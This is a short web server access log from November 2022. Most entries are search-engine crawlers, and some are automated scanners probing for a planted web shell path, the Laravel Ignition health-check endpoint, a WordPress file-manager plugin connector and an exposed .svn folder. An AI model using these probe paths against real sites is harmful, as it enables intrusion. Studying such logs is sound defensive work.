5.161.153.137 - - [23/Nov/2022:21:43:24 +0100] "GET /wp-admin/shell20211028.php HTTP/1.1" 301 563 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.244.66.196 - - [23/Nov/2022:22:43:07 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [24/Nov/2022:01:30:38 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
207.46.13.177 - - [24/Nov/2022:05:48:56 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
147.78.47.249 - - [24/Nov/2022:18:36:39 +0100] "GET /_ignition/health-check/ HTTP/1.1" 301 520 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [24/Nov/2022:18:36:43 +0100] "GET /public/_ignition/health-check/ HTTP/1.1" 301 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [24/Nov/2022:18:36:46 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [24/Nov/2022:18:36:48 +0100] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 602 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
207.46.13.177 - - [24/Nov/2022:20:15:48 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.97 - - [25/Nov/2022:06:15:48 +0100] "GET /robots.txt HTTP/1.1" 301 531 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.177 - - [25/Nov/2022:06:15:56 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
141.255.167.186 - - [25/Nov/2022:14:48:53 +0100] "GET /.svn HTTP/1.1" 301 482 "-" "Python-urllib/3.7"
167.114.113.132 - - [25/Nov/2022:17:04:27 +0100] "HEAD / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
